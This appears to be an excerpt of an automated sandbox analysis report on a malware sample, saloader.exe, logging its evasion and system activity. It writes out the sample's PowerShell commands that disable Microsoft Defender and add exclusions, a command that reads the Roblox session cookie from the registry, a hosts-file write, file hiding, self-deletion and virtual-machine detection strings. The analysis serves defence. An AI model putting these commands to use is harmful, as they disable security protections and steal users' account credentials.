                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\saloader.exe | Memory allocated: 2113D9B0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\saloader.exe | Memory allocated: 21157390000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 598343
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 598234
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 598124
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 598015
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597906
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597796
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597687
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597578
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597468
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597359
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597249
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597128
                        Source: C:\Users\user\Desktop\saloader.exe | Thread delayed: delay time: 597015
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\saloader.exe | Window / User API: threadDelayed 4448
                        Source: C:\Users\user\Desktop\saloader.exe | Window / User API: threadDelayed 5390
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6092
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3576
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2669
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 382
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4118
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 967
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4271
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2782
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2907
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1120
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -18446744073709540s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99875s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99765s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99656s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99546s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99437s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99328s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99218s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -99108s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -98999s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -98886s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -98778s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -98667s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -98559s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -98452s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -598343s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -598234s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -598124s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992 | Thread sleep time: -598015s >= -30000s
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597796s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597359s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597249s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597128s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597015s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep count: 6092 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 3576 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2669 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 382 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 4118 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 967 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep count: 4271 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 2782 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 2907 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 1120 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99546Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99218Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99108Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98999Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98886Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98778Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98667Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98559Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98452Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598234Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598124Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598015Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597906Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597796Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597249Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597128Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: saloader.exe, FRc7Z.scr.0.dr | Binary or memory string: vboxtray
                        Source: FRc7Z.scr.0.dr | Binary or memory string: vboxservice
                        Source: saloader.exe, FRc7Z.scr.0.dr | Binary or memory string: qemu-ga
                        Source: FRc7Z.scr.0.dr | Binary or memory string: vmwareuser
                        Source: saloader.exe, FRc7Z.scr.0.dr | Binary or memory string: vmusrvc
                        Source: FRc7Z.scr.0.dr | Binary or memory string: vmwareservice+discordtokenprotector
                        Source: FRc7Z.scr.0.dr | Binary or memory string: vmsrvc
                        Source: FRc7Z.scr.0.dr | Binary or memory string: vmtoolsd
                        Source: FRc7Z.scr.0.dr | Binary or memory string: vmwaretray
                        Source: saloader.exe, 00000000.00000002.1918588058.000002113D8E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\saloader.exe | Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\saloader.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exe | File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\saloader.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\saloader.exe | Queries volume information: C:\Users\user\Desktop\saloader.exe VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
